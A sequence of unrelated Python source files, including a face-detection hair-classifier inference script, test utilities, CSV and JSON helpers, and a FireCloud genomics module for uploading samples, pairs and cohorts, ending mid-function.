'english reading room': ['grace m. hunt memorial english reading room ', 'err'],
'facilities management building': ['fmb', 'fm'],
'fellowship for international service & health - fish': ['fish'],
'film & television archive': ['arsc'],
'foshay learning center': ['flc'],
'friends of the semel institute for neuroscience and human behavior': ['friends of npi'],
'gamma rho lambda - zeta chapter at ucla': ['grl'],
'gonda (goldschmied) neuroscience and genetics research center': ['gonda'],
'gonda family library': ['gfl'],
'humanities building ucla': ['kaplan', 'kaplan hall', 'kaplan building'],
'international student association / isa at ucla': ['isa'],
'iranian student group at ucla': ['isg', 'isg at ucla'],
'james west alumni center aka jwac': ['jwac'],
'latino business student association at ucla': ['lbsa'],
'law student bar association': ['lsba', 'sba'],
'learning resource center': ['lrc'],
'los angeles': ['la'],
'los angeles ski and board club': ['lasbc'],
'macdonald medical research laboratory': ['mmrl', 'mrl'],
'muslim student association at ucla': ['msa'],
'near eastern languages & cultures': ['nelc'],
'new student & transition programs': ['nstp'],
'phi delta theta - ucla': ['pdt'],
'phi kappa sigma ucla': ['pks'],
'phi sigma rho': ['psr'],
'pi kappa phi ucla': ['pkp'],
'reed neurological research center': ['rnrc'],
'rendezvous': ['rende'],
'rocco\'s tavern': ['roccos', 'rocco\'s'],
'spear - samahang pilipino education and retention': ['spear'],
'science and technology research building': ['strb'],
'semel institute for neuroscience and human behavior': ['semel'],
'sigma alpha mu at ucla': ['sam'],
'students with dependents program at the ucla bruin resource center': ['swd'],
'student committee for the arts at ucla': ['sca'],
'the association of ucla gamers - augment': ['augment'],
'ucla center for brazilian studies': ['lcbs', 'cbs'],
'ucla community programs office': ['cpo'],
'ucla engineering graduate students association': ['egsa'],
'ucla institute of the environment and sustainability': ['ioes'],
'ucla intergroup relations program (igr)': ['igr'],
'ucla kappa alpha theta': ['kat'],
'ucla kinross recreation center (krec)': ['krec'],
'ucla mindful awareness research center': ['marc'],
'ucla pi beta phi': ['pbp'],
'ucla police department': ['ucpd'],
'ucla undergraduate research center-humanities, arts, and social sciences': ['ucla ugresearch', 'ugr'],
'undergraduate astronomical society': ['uas'],
'undocumented student program': ['usp'],
'westwood branch - los angeles public library': ['lapl'],
'writing success program at ucla': ['wsp']
} |
991,481 | b677a829d1b0e1ae83713fc7db683ee16a5ca22e | import argparse
import cv2
import numpy as np
import torch
from facenet_pytorch.models.mtcnn import MTCNN
from omegaconf import OmegaConf
from tqdm import tqdm
import time
from pathlib import Path
from experiment import HairClassifier
from transforms.transform import get_infer_transform
from utils.infer_utils import crop_faces
SCALE = [1.2, 1.25, 1.3, 1.5] # TTA
MIN_CROP_SIZE = 80
PATH_TO_IMAGES = "/home/malchul/work/projects/hair_classifier/val_images"
FORMAT_FILES = ['.png', '.jpg', '.jpeg']
parser = argparse.ArgumentParser('Detect faces on image')
parser.add_argument('--model_path',
default='./pretrained/shufflenetv2_epoch_94_f1_score=0.973.ckpt')
parser.add_argument('--is_quant', action='store_true', help='if model is quantized, pass this argument')
parser.add_argument('--eval_folder', help='path to eval folder with images')
parser.add_argument('--output_data', default='./result.csv', help='path to output file')
parser.add_argument('--dump_images', default=None, help='dump images for debug')
parser.add_argument('--is_cpu', action='store_true')
args = parser.parse_args()
if args.dump_images:
output_path = Path(args.dump_images)
output_path.mkdir(exist_ok=True)
if __name__ == '__main__':
detector = MTCNN()
config = OmegaConf.load('configs/main_config.yml')
num_classes = config.model.num_classes
print('loading model')
if not args.is_quant:
model = HairClassifier.load_from_checkpoint(args.model_path, strict=False)
model.eval()
if not args.is_cpu:
model = model.cuda()
else:
model = torch.jit.load(args.model_path)
model.eval()
for _ in range(10):
model.dequant(
model(model.quant(torch.rand(1, 3, config.datasets.train.load_size, config.datasets.train.load_size))))
print('loading complete')
images_folder = Path(args.eval_folder)
filenames = []
for ext in FORMAT_FILES:
filenames.extend(images_folder.rglob('*' + ext))
filenames = sorted(list(map(str, filenames)))
transforms = get_infer_transform(config.datasets.train.load_size)
result = []
for file_id, filename in tqdm(list(enumerate(filenames))):
frame = cv2.imread(filename)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
detection = detector.detect(frame)
class_img = -1
face_crops = crop_faces(frame, detection, SCALE)
infer_time = -1
for crop_id, crops in enumerate(face_crops):
#if crop.shape[0] > MIN_CROP_SIZE and crop.shape[1] > MIN_CROP_SIZE:
resized_crop = torch.stack([transforms(crop) for crop in crops])
infer_time = time.time()
with torch.no_grad():
if not args.is_quant:
if not args.is_cpu:
resized_crop = resized_crop.cuda()
res = model(resized_crop)
else:
res = model.dequant(model(model.quant(resized_crop)))
infer_time = time.time() - infer_time
res = res.detach().cpu()
# TTA aggregation
res, _ = res.max(0)
if num_classes == 1:
class_img = int(res > 0)
else:
class_img = int(torch.argmax(res, 0))
if args.dump_images:
crop = (((resized_crop[-1].permute(1,2,0) + 1) / 2) * 255).cpu().numpy().astype(np.uint8)
cv2.imwrite(str(output_path / f'class_{class_img}_file_{file_id}.png'),
cv2.cvtColor(crop, cv2.COLOR_RGB2BGR))
break
print('result', (filename, class_img), 'classifier time', infer_time, 'ms')
result.append((filename, class_img))
with open(args.output_data, 'w') as f:
for path, class_id in result:
f.write(f'{path},{class_id}\n')
|
991,482 | 435f0edf22db434c748a323ee62e5e9b46a140c2 | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2019 Jan-Philip Gehrcke. See LICENSE file for details.
from __future__ import unicode_literals
from unittest import TestCase
from distutils import dir_util, file_util
from inspect import currentframe
import os
test_data_folder_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data")
class TestBase(TestCase):
@classmethod
def setup_class(cls):
cls.output_folder_path = os.path.join(test_data_folder_path, "_output")
cls.output_latex_folder_path = os.path.join(cls.output_folder_path, "latex")
cls.output_latex_body_file_path = os.path.join(cls.output_latex_folder_path, "latex-body.tex")
cls.output_latex_document_file_path = os.path.join(cls.output_latex_folder_path, "latex-document.tex")
cls.output_html_folder_path = os.path.join(cls.output_folder_path, "html")
cls.output_html_index_file_path = os.path.join(cls.output_html_folder_path, "index.html")
cls.failure_folder_path = os.path.join(test_data_folder_path, "_failed")
# dir_util.remove_tree(cls.failure_folder_path) # TODO remove only once before all test
@classmethod
def set_paths(cls, test_folder_path):
cls.test_folder_path = test_folder_path
cls.input_folder_path = os.path.join(test_folder_path, "src")
cls.setup_file_path = os.path.join(cls.input_folder_path, "setup.toml")
cls.input_file_path = os.path.join(cls.input_folder_path, "textstory.txt")
cls.expected_folder_path = os.path.join(cls.test_folder_path, "expected")
cls.expected_latex_folder_path = os.path.join(cls.expected_folder_path, "latex")
cls.expected_latex_body_file_path = os.path.join(cls.expected_latex_folder_path, "latex-body.tex")
cls.expected_latex_document_file_path = os.path.join(cls.expected_latex_folder_path, "latex-document.tex")
cls.expected_html_folder_path = os.path.join(cls.expected_folder_path, "html")
cls.expected_html_index_file_path = os.path.join(cls.expected_html_folder_path, "index.html")
@classmethod
def read_file(cls, file_path):
with open(file_path, "rb") as f:
file_content = f.read()
return file_content
def compare_file_contents(self, expected_file_path, actual_file_path):
# Compare LaTeX body with expected
first_file = self.read_file(expected_file_path)
second_file = self.read_file(actual_file_path)
if first_file != second_file:
dir_util.mkpath(self.failure_folder_path)
split = os.path.split(expected_file_path)
failure_file_prefix = currentframe().f_back.f_code.co_name
first_fail_path = os.path.join(self.failure_folder_path, failure_file_prefix + "_expected_" + split[len(split) - 1])
file_util.copy_file(expected_file_path, first_fail_path, update=1)
split = os.path.split(actual_file_path)
second_fail_path = os.path.join(self.failure_folder_path, failure_file_prefix + "_actual_" + split[len(split) - 1])
file_util.copy_file(actual_file_path, second_fail_path, update=1)
self.fail("{0} does not match {1}".format(expected_file_path, actual_file_path))
def tearDown(self):
# Cleanup
if os.path.exists(self.output_folder_path):
dir_util.remove_tree(self.output_folder_path)
|
991,483 | 870b7b588cc3df622e09b6d7f12882a7304daac2 | #!/usr/bin/env python2
import signal
import logging
from programs import Program
from switches.base import SwitchProxy
from writer.base import WriterProxy
from manager.base import ManagerProxy
from misc.autobahnWebSocketBase import WebSocketBase
from conf.private import writer, switches, manager, switch_programs_file
LOG_FORMAT = '%(asctime)s - %(levelname)-8s %(message)s'
logging.basicConfig(format=LOG_FORMAT, level='DEBUG', filename="angezeige.log")
def main():
def cleanup_exit(*args, **kwargs):
print("\nBye!")
Program.stop()
s.disable()
w.disable()
m.disable()
WebSocketBase.stop_reactor()
exit()
signal.signal(signal.SIGINT, cleanup_exit)
w = WriterProxy(items=writer)
s = SwitchProxy(items=switches, switch_programs_file=switch_programs_file)
m = ManagerProxy(items=manager)
# Start first program in circle
w.enable()
s.enable()
WebSocketBase.start_reactor()
s.next()
# is blocking if urwid enabled
# urwid has to be run in the main thread
m.enable()
if not m.is_urwid_enabled():
signal.pause()
cleanup_exit()
if __name__ == "__main__":
main()
|
991,484 | cf8834e562f4f498e29c5c398ca7dbf0dfd941c4 | # -*- coding: utf-8 -*-
"""Main module."""
def simpleAddition(num1, num2):
return num1 + num2 |
991,485 | f02f427e11a1843917f3a40d28a9e5f8101819f7 | #run this by 'python3 manage.py runscript load_from_csv
import csv
from majorApp.models import News
def run():
fhand = open('data/test_data.csv')
reader = csv.reader(fhand)
News.objects.all().delete()
for row in reader:
print(row)
# news, created = News.objects.get_or_create(title_text = row[0],url = row[1], time = row[2], label = row[6])
# news.save()
news = News(title_text = row[0],url = row[1], time = row[2], label = row[6])
news.save() |
991,486 | 6cd7ad096e1abb15a2bac8ecdbb0fc47cce70b47 | from datetime import datetime
def list_to_json(book_list):
size = len(book_list)
json = '{"book_list": {'
for index, book in enumerate(book_list):
if index == size - 1:
book_json = '"book": ' + book.to_json()
else:
book_json = '"book": ' + book.to_json() + ', '
json = json + book_json
json = json + "}}"
return json
def save_json(json):
dt = datetime.now()
dt_str = dt.strftime("%Y-%m-%d_%H%M%S")
path = "result\\" + dt_str + ".json"
with open(path, 'w', encoding='utf-8', newline='') as f:
try:
f.write(json)
finally:
f.close()
|
991,487 | 4be33ec39fb8e3ff4d5245d7b000400858826274 | #!/usr/bin/python
# Plot an image from a CSV file. xpix, ypix, iter.
# JM Wed 22 Nov 2017 21:39:59 GMT
import csv
from PIL import Image
from timeit import default_timer as timer
from lc import colour_list
import sys
import os
start = timer()
lenlc = len( colour_list )
rnum = 93
maxiter = 150
white = (255,255,255)
#randcolour = ( 135,206,250)
randcolour = ( 255,255,250)
fname = sys.argv[ 1 ]
with open( fname ) as f:
reader = csv.reader(f)
row1 = next(reader)
print 'Row1:', row1
X_SIZE = row1[ 0 ]
Y_SIZE = row1[ 1 ]
X_SIZE = int( X_SIZE )
Y_SIZE = int( Y_SIZE )
print 'X_SIZE: ', X_SIZE
print 'Y_SIZE: ', Y_SIZE
img = Image.new( "RGB", [ X_SIZE, Y_SIZE ], white )
for row in reader:
#print 'Row:', row
x_pixel = int( row[ 0 ] )
y_pixel = int( row[ 1 ] )
iter_count = int( row[ 2 ] )
mycolour = colour_list[ iter_count % lenlc ]
#mycolour = ( 13 * iter_count, 23 * iter_count, 33 * iter_count )
img.putpixel( ( x_pixel, y_pixel ), mycolour )
'''
if ( iter_count + rnum >= lenlc ):
mycolour = colour_list[ iter_count % lenlc ]
else:
mycolour = colour_list[ iter_count + rnum ]
if ( iter_count <= 2 ):
img.putpixel( ( x_pixel, y_pixel ), white )
elif ( iter_count == maxiter ):
img.putpixel( ( x_pixel, y_pixel ), randcolour )
else:
img.putpixel( ( x_pixel, y_pixel ), mycolour )
'''
dt = timer() - start
out_fname, file_extension = os.path.splitext( fname )
print 'Test plot from CSV created in %f s' % dt
print 'OFa:', out_fname, ' EXT:', file_extension
out_fname = out_fname + '_' + str( rnum ) + '.png'
print 'OFb:', out_fname
img.show()
#img.save( out_fname )
|
991,488 | c11bf33e1d0daa539d6cf6a0e2e5a8cdda1e39a7 | import os
import re
import pandas as pd
import numpy as np
from firecloud import api as firecloud_api
import datetime
import glob
"""
_____ ___ ____ _____ ____ _ ___ _ _ ____ ____ _ _ ____ _ ____
| ___|_ _| _ \| ____/ ___| | / _ \| | | | _ \ / ___|| | | |/ ___| / \ | _ \
| |_ | || |_) | _|| | | | | | | | | | | | | | \___ \| | | | | _ / _ \ | |_) |
| _| | || _ <| |__| |___| |__| |_| | |_| | |_| | ___) | |_| | |_| |/ ___ \| _ <
|_| |___|_| \_\_____\____|_____\___/ \___/|____/ |____/ \___/ \____/_/ \_\_| \_\
"""
"""
INSTRUCTIONS:
FILES TO UPDATE PRIOR TO RUNNING:
cohort_files/bsp_latest_all_samples_ --> REPLACE WITH LATEST BSP SPREADSHEET
remote_files/ --> ALL THE FILES HERE
walkupseqfiles/ --> ALL FILES HERE AND COMBINE
"""
########################################################
# Sample functions
########################################################
def get_samples(paths_to_batches_info, google_bucket_id, sublist=None):
"""
Compile samples from multiple batches
Args: Self-explanatory
- paths_to_samples_info: .xlsx file containing paths to files containing sample_info
- sublist: list of tsca_ids to only compile data from certain batches. If None, compile data from all batches.
Returns:
- df with samples from all batches
"""
paths_to_samples = pd.read_excel(paths_to_batches_info, index_col=0)
df_list = []
for tsca_id, paths in paths_to_samples.iterrows():
if sublist is not None and tsca_id not in sublist:
continue
# Make data Firecloud-compatible
batch_data = prepare_batch_samples_for_metadata_export(paths.path_to_samples_info, tsca_id, google_bucket_id)
df_list.append(batch_data)
all_samples = pd.concat(df_list, axis=0)
# Add cohort codes to data
cohort_formatted_names = pd.read_table('cohort_files/cohort_names_dictionary.txt', header=None, names=['Collection', 'cohort_code'])
all_samples = pd.merge(all_samples, cohort_formatted_names, on='Collection', how='left')
return all_samples
def add_cohort_to_old_batches(all_samples):
"""
Older batches didn't come with the Collection attribute, so it must be added
Args:
- all_samples: all samples, without cohort data
"""
# Retrieve list of samples with corresponding cohort from bsp.broadinstitute.org
samples_with_cohort = pd.read_excel('cohort_files/bsp_latest_all_samples_TSCA22.xls')
# Add column for join
samples_with_cohort['bsp_sample_id_validation'] = samples_with_cohort['Sample ID']
# FC doesn't accept cohort names with non-alphanumeric characters, so use cohort codes instead
# Load dictionary of {long cohort name : short cohort code}
cohort_formatted_names = pd.read_table('cohort_files/cohort_names_dictionary.txt', header=None, names=['Collection', 'cohort_code'])
# Add cohort codes to samples_with_cohort
samples_with_cohort = pd.merge(samples_with_cohort, cohort_formatted_names, on='Collection', how='inner')
# Add cohort data to all samples
data = pd.merge(all_samples, samples_with_cohort[['bsp_sample_id_validation', 'cohort_code', 'Collection']], \
on='bsp_sample_id_validation', \
how='left')
# Merge two `Collection` columns created
data.loc[pd.isnull(data['cohort_code_x']), 'cohort_code'] = data.loc[pd.isnull(data['cohort_code_x']), 'cohort_code_y']
data.loc[pd.isnull(data['cohort_code_y']), 'cohort_code'] = data.loc[pd.isnull(data['cohort_code_y']), 'cohort_code_x']
data.loc[pd.isnull(data['Collection_x']), 'Collection'] = data.loc[pd.isnull(data['Collection_x']), 'Collection_y']
data.loc[pd.isnull(data['Collection_y']), 'Collection'] = data.loc[pd.isnull(data['Collection_y']), 'Collection_x']
data = data.drop(['cohort_code_x', 'cohort_code_y'], axis=1)
data = data.drop(['Collection_x', 'Collection_y'], axis=1)
return data
def prepare_batch_samples_for_metadata_export(path_to_samples_info, tsca_id, google_bucket_id):
"""Prepare the file to export samples metadata to firecloud
Args:
path_id: path to file ending in {}.import_samples.txt
tsca_id: TSCAXX
google_bucket_id: id of google bucket ('gs://google_bucket_id')
Returns:
pd.DF of data ready for export
"""
# export raw data
data = pd.read_table(path_to_samples_info)
# Rename columns to match firecloud requirements
data = data.rename(columns={'sample_id':'entity:sample_id', 'individual_id':'participant_id'})
# Locations of BAM files in google bucket
path_in_bucket_full = "gs://%s/seq_data/%s" % (google_bucket_id, tsca_id)
# Extract bam filename
data['bam_filename'] = data.apply(lambda row: row['clean_bam_file_capture'].split('/')[-1], axis=1)
# Create bai filename (change extension on .bam file)
data['bai_filename'] = data.apply(lambda row: "%s%s" %(row['bam_filename'][:-3], 'bai'), axis=1)
# Change BAM path from xchip to Google cloud
data['clean_bam_file_capture'] = \
data.apply( lambda row: "%s/%s/%s" \
%(path_in_bucket_full, row['external_id_validation'], row['bam_filename']), axis=1)
# Add location of .bai file
data['clean_bai_file_capture'] = \
data.apply( lambda row: "%s/%s/%s" \
%(path_in_bucket_full, row['external_id_validation'], row['bai_filename']), axis=1)
# Add TSCA ID
data['tsca_id'] = tsca_id
# Reorganize columns (entity:sample_id at the beginning)
columns = ['entity:sample_id'] + [col for col in data if col != 'entity:sample_id']
data = data[columns]
return data
def save_and_upload_samples(data, namespace, workspace, tsca_id):
"""Create FC uploading file and upload patients to FC
Args:
- data: participants df
Writes:
- {tsca_id}/fc_upload_patients_tsca_{tsca_id}.txt
"""
os.system('mkdir -p %s'%tsca_id)
filename = '%s/fc_upload_samples_tsca_%s.txt' % (tsca_id, tsca_id)
data.to_csv(filename, sep='\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
########################################################
# Pairs functions
########################################################
def create_pairs_list(all_samples):
"""Creates DF with pairs for firecloud metadata export.
Args:
- all_samples: all samples.
"""
dfs = []
# Find match normals for tumor samples only
tumor_samples = all_samples[all_samples.sample_type=="Tumor"]
i = 0
for index, row in tumor_samples.iterrows():
# Find all samples from same individual (same individual_id, different sample_id)
patient_samples = all_samples[ (all_samples['participant_id'] == row['participant_id']) \
& (all_samples['entity:sample_id'] != row['entity:sample_id']) ]
# NOTE: If more than one match tumor tissue or match normal found, select first one found.
# The match normal is used to compute allelic fractions in Mutect2, so for now we ignore the conditions it workspaces grown in.
######## Match normal: Add match normal
match_normal = patient_samples[ patient_samples['sample_type'] == "Normal"]
# > No match normal found
if match_normal.empty:
control_sample_id = "NA"
control_sample_tsca_id = "NA"
# > Match normal found
elif match_normal.shape[0] > 0:
match_normal = match_normal.iloc[0]
control_sample_id = match_normal['entity:sample_id']
control_sample_tsca_id = match_normal['tsca_id']
# Create DF with Tumor/Normal pair set
pair_id = "%s_%s_TN" % (row['entity:sample_id'], control_sample_id)
df_dict = {'entity:pair_id': pair_id, 'case_sample_id': row['entity:sample_id'], \
'control_sample_id': control_sample_id, 'participant_id': row['participant_id'], 'match_type': 'tumor_normal', \
'case_sample_tsca_id': row['tsca_id'], 'control_sample_tsca_id': control_sample_tsca_id}
dfs.append(pd.DataFrame(df_dict, index=[i], columns=df_dict.keys()))
i+=1
######## Tumor tissue: Add primary tumor tissue
match_primary_tumor = patient_samples[ ( patient_samples['external_id_validation'].str.contains('primary|prim|tissue|tiss|Primary|Tissue') ) & \
(patient_samples['sample_type'] == "Tumor")]
# > No primary tumor tissue found
if match_primary_tumor.empty:
control_sample_id = "NA"
control_sample_tsca_id = "NA"
# > Sample itself is a primary tumor tissue
elif any(substring in row['external_id_validation'] for substring in ['primary', 'prim', 'tissue', 'tiss', 'Primary', 'Tissue']):
control_sample_id = "NA"
control_sample_tsca_id = "NA"
# > Tumor tissue found
elif match_primary_tumor.shape[0] > 0:
match_primary_tumor = match_primary_tumor.iloc[0]
control_sample_id = match_primary_tumor['entity:sample_id']
control_sample_tsca_id = match_primary_tumor['tsca_id']
# Create DF with Tumor/Primary pair set
pair_id = "%s_%s_TP" % (row['entity:sample_id'], control_sample_id)
df_dict = {'entity:pair_id': pair_id, 'case_sample_id': row['entity:sample_id'], \
'control_sample_id': control_sample_id, 'participant_id': row['participant_id'], 'match_type': 'tumor_primary', \
'case_sample_tsca_id': row['tsca_id'], 'control_sample_tsca_id': control_sample_tsca_id}
dfs.append(pd.DataFrame(df_dict, index=[i], columns=df_dict.keys()))
i+=1
return pd.concat(dfs, axis=0)
def save_and_upload_pairs(namespace, workspace, pairs, blacklist=[]):
"""Updates pairs to firecloud.
NOTE: All pairs need to be updated with every new batch,
as it may contain match normals or primary matches for previous batches.
Args:
- pairs: df of all pairs, as created by create_pairs_list
Returns:
- res: json response from http request
Creates:
- ./Pairs/fc_upload_pairs.txt file
"""
pairs = pairs[ ~pairs['case_sample_id'].isin(blacklist)]
os.system('mkdir -p Pairs')
filename = './Pairs/fc_upload_pairs.txt'
pairs.to_csv(filename, '\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
########################################################
# Pair set functions
########################################################
def prepare_batch_pairsets_for_metadata_export(all_samples, pairs, tsca_id):
"""Creates pair sets for FC export, both tumor-normal and tumor-primary pairs
Args:
- all_samples: all samples
- pairs: pairs df as created by create_pairs_list
Returns:
- Tuple of dfs: (tumor-normal, tumor-primary)
"""
tn_pairs = pairs[(pairs['match_type'] == "tumor_normal") & (pairs['case_sample_tsca_id']==tsca_id)]
tp_pairs = pairs[(pairs['match_type'] == "tumor_primary") & (pairs['case_sample_tsca_id']==tsca_id)]
tn_pairsets = pd.merge(tn_pairs, all_samples[['entity:sample_id', 'tsca_id']], \
left_on='case_sample_id', right_on='entity:sample_id', \
how='inner')[['tsca_id', 'entity:pair_id']] \
.rename(columns={'tsca_id': 'membership:pair_set_id', 'entity:pair_id': 'pair_id'})
tp_pairsets = pd.merge(tp_pairs, all_samples[['entity:sample_id', 'tsca_id']], \
left_on='case_sample_id', right_on='entity:sample_id', \
how='inner')[['tsca_id', 'entity:pair_id']] \
.rename(columns={'tsca_id': 'membership:pair_set_id', 'entity:pair_id': 'pair_id'})
# Append _TN/_TP to the end of the tumor-normal/tumor-primary pair set ids
tn_pairsets['membership:pair_set_id'] = tn_pairsets['membership:pair_set_id'].apply(lambda x: "%s_TN"%x)
tp_pairsets['membership:pair_set_id'] = tp_pairsets['membership:pair_set_id'].apply(lambda x: "%s_TP"%x)
return (tn_pairsets, tp_pairsets)
def prepare_cumulative_pairsets_for_metadata_export(pairs, name):
"""Creates pair sets for FC export, both tumor-normal and tumor-primary pairs.
Pair sets are cumulative, not batch-based.
Args:
- pairs: pairs df as created by create_pairs_list
- name: name of cumulative pairset, usually TSCA# of current tsca_id
Returns:
- Tuple of dfs: (tumor-normal, tumor-primary) of cumulative pairs
"""
tn_pairsets = pairs.loc[pairs['match_type'] == "tumor_normal", ["entity:pair_id"]].rename(columns={"entity:pair_id":"pair"})
tp_pairsets = pairs.loc[pairs['match_type'] == "tumor_primary", ["entity:pair_id"]].rename(columns={"entity:pair_id":"pair"})
tn_pairsets['membership:pair_set_id'] = "Cum_TN_%s_all"%name
tp_pairsets['membership:pair_set_id'] = "Cum_TP_%s_all"%name
return tn_pairsets[['membership:pair_set_id', 'pair']], tp_pairsets[['membership:pair_set_id', 'pair']]
def upload_pairsets(namespace, workspace, pairsets, pairset_type):
os.system('mkdir -p Pairs')
filename = './Pairs/fc_upload_pairsets_%s.txt'%pairset_type
pairsets.to_csv(filename, '\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
###############################################
# Participant functions
###############################################
def prepare_participants_for_metadata_export(path_to_samples_info, tsca_id):
"""Create participant entities DF for Firecloud.
Participants need to exist before you can upload their respective samples
"""
raw = pd.read_table(path_to_samples_info)
print( "%d Participants in this batch" % raw['individual_id'].unique().shape[0] )
# Data to upload
data = pd.DataFrame(raw.individual_id.drop_duplicates()).rename(columns={'individual_id':'entity:participant_id'})
return data
def save_and_upload_participants(data, namespace, workspace, tsca_id):
"""Create FC uploading file and upload patients to FC
Args:
- data: participants df
Writes:
- {tsca_id}/fc_upload_patients_tsca_{tsca_id}.txt
"""
os.system('mkdir -p %s'%tsca_id)
filename = './%s/fc_upload_patients_%s.txt' % (tsca_id, tsca_id)
data.to_csv(filename, '\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
########################################################
# Sample set functions
########################################################
def prepare_batch_sample_set_for_metadata_export(path, tsca_id):
"""Create dfs and write files with sample_set metadata for Firecloud.
Three sample sets are created: all samples, normal samples, and tumor samples in batch
A sample for a given batch
Args:
- path: path to file ending in {}.import_samples.txt
- tsca_id: batch tsca id
Returns:
- (all_samples, tumor_samples, normal_samples)
Writes:
- files for all_samples, tumor_samples, normal_samples
"""
raw = pd.read_table(path)
print( "%d Samples in this batch" % raw.shape[0] )
# Create dfs to upload
all_samples = pd.concat([pd.DataFrame(index=raw.index, columns=['membership:sample_set_id'], data=tsca_id), \
raw[ ['sample_id', 'sample_type'] ]], axis=1)
tumors = all_samples.loc[ all_samples['sample_type'] == "Tumor", ['membership:sample_set_id', 'sample_id'] ]
tumors.loc[: , 'membership:sample_set_id'] = "%s_T"%tsca_id
normals = all_samples.loc[ all_samples['sample_type'] == "Normal", ['membership:sample_set_id', 'sample_id'] ]
normals.loc[: , 'membership:sample_set_id'] = "%s_N"%tsca_id
all_samples = all_samples.drop('sample_type', axis=1)
return (all_samples, tumors, normals)
def filter_existing_samples(df, sample_id_colname, remote_samples):
"""If sample set is uploaded more than once, samples will be duplicated, which is undesirable behavior.
Therefore, need to download samples existing remotely (in FC), and remove them from sample set to be uploaded.
Args:
- df: dataframe to filter
- sample_id_colname: name of column containing sample_id
"""
remote_sample_ids = remote_samples['entity:sample_id'].tolist()
df_clean = df[~df[sample_id_colname].isin(remote_sample_ids)]
return df_clean
def save_and_upload_batch_sample_sets(batch_samples, batch_tumors, batch_normals, tsca_id, namespace, workspace):
"""Create FC uploading file and upload patients to FC
"""
# Save to file
os.system('mkdir -p %s'%tsca_id)
batch_samples_filename = './%s/fc_upload_sample_set_tsca_%s.txt' % (tsca_id, tsca_id)
batch_tumors_filename = './%s/fc_upload_sample_set_tsca_%s_tumors.txt' % (tsca_id, tsca_id)
batch_normals_filename = './%s/fc_upload_sample_set_tsca_%s_normals.txt' % (tsca_id, tsca_id)
batch_samples.to_csv(batch_samples_filename , sep="\t", index=False )
batch_tumors.to_csv(batch_tumors_filename , sep="\t", index=False )
batch_normals.to_csv(batch_normals_filename , sep="\t", index=False )
r1 = upload_entities_from_tsv(namespace, workspace, batch_samples_filename)
r2 = upload_entities_from_tsv(namespace, workspace, batch_tumors_filename)
r3 = upload_entities_from_tsv(namespace, workspace, batch_normals_filename)
return (r1, r2, r3)
########################################################
# Cohort functions
########################################################
def prepare_cohorts_for_metadata_export(all_samples, blacklist=[]):
"""Creates sample sets corresponding to cohorts for Firecloud export.
Args:
- all_samples: with cohort
Returns:
- metadata with samples and cohorts they belong to for FC upload
"""
# Prepare for FC export format
data = all_samples.rename(columns={'cohort_code': 'membership:sample_set_id', 'entity:sample_id': 'sample_id'})
data_clean = data[['membership:sample_set_id', 'sample_id']]
# Remove blacklist
data_clean = data_clean[ ~data_clean['sample_id'].isin(blacklist)]
return data_clean
def save_and_upload_cohorts(data, latest_tsca_id, namespace, workspace):
"""Save and upload cohort metadata to FC
"""
# Write FC import file
filename = 'cohort_files/fc_upload_sample_set_cohorts_%s.txt'%latest_tsca_id
data.to_csv(filename, index=False, sep="\t")
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
def prepare_cohort_pairsets_for_metadata_exports(latest_tsca_id, pairs, all_samples, blacklist=[]):
"""Create DF with cohort pairsets, used to create cohort reports for SNVs.
Args:
- pairs: pair list
- all_samples: all samples with cohort
Returns:
- DF with [cohort_code, pair_id]
"""
# Create list of pairs
clean_pairs_list = pairs[ ~pairs['case_sample_id'].isin(blacklist)]
# Keep only tumor-normal pairs, as only these pairs are used for cohort reports
clean_pairs_list = clean_pairs_list[clean_pairs_list["match_type"]=="tumor_normal"]
# Add cohorts to pairs
pairs_with_cohort = pd.merge(clean_pairs_list, all_samples[['entity:sample_id', 'cohort_code']], \
left_on='case_sample_id', right_on='entity:sample_id')
# Prepare DF for FC export
pairs_with_cohort_clean = pairs_with_cohort[['cohort_code', 'entity:pair_id']] \
.rename(columns={'entity:pair_id': 'pair_id', 'cohort_code': 'membership:pair_set_id'})
return pairs_with_cohort_clean
def save_and_upload_cohort_pairsets(namespace, workspace, pairsets):
os.system('mkdir -p Pairs')
filename = './Pairs/fc_upload_cohort_pairsets.txt'
pairsets.to_csv(filename, '\t', index=False)
res = upload_entities_from_tsv(namespace, workspace, filename)
return res
def save_and_upload_cohort_all_samples(all_samples, name, namespace, workspace, blacklist=[]):
"""Create and upload cohort all samples
Args:
- Self-explanatory
"""
df = all_samples[['entity:sample_id']].rename(columns={'entity:sample_id': 'sample_id'})
df['membership:sample_set_id'] = name
# Re-arrange columns
cols = ['membership:sample_set_id', 'sample_id']
df = df[cols]
# Blacklist
df = df[ ~df['sample_id'].isin(blacklist) ]
df.to_csv('all_samples/fc_upload_%s.txt'%name, index=None, sep="\t")
res = upload_entities_from_tsv(namespace, workspace, 'all_samples/fc_upload_%s.txt'%name)
return res
def save_and_upload_cohort_all_tumors(all_samples, name, namespace, workspace, blacklist=[]):
"""Create and upload cohort of all tumor samples across all batches
Args:
- Self-explanatory
- name: cohort name (usually Cum_Tumors_{LATEST_TSCA_ID}_all)
- paths_to_samples_info: .xlsx file containing paths to files containing sample_info
"""
tumor_samples = all_samples[all_samples.sample_type == "Tumor"]
# Prepare column names
df = tumor_samples[['entity:sample_id']].rename(columns={'entity:sample_id': 'sample_id'})
df['membership:sample_set_id'] = name
# Re-arrange columns
cols = ['membership:sample_set_id', 'sample_id']
df = df[cols]
# Blacklist
df = df[ ~df['sample_id'].isin(blacklist) ]
df.to_csv('tumor_samples/fc_upload_%s.txt'%name, index=None, sep="\t")
res = upload_entities_from_tsv(namespace, workspace, 'tumor_samples/fc_upload_%s.txt'%name)
return res
########################################################
# PoN Functions
########################################################
def create_panel_of_normals_advanced(tsca_id, all_samples, num_normals_per_cohort_involved = 3, batches_to_pick_from = []):
"""Create a panel of normals for batch with @tsca_id.
Add @num_normals_per_cohort_involved normal samples from all the cohorts involved.
You can restrict the batches you pool normals from to the list of batches in @batches_to_pick_from.
"""
# Get all samples
batch_samples = all_samples[all_samples['tsca_id']==tsca_id]
# Batch normals
batch_normals = batch_samples[batch_samples['sample_type']=="Normal"]
# Number of normals in batch
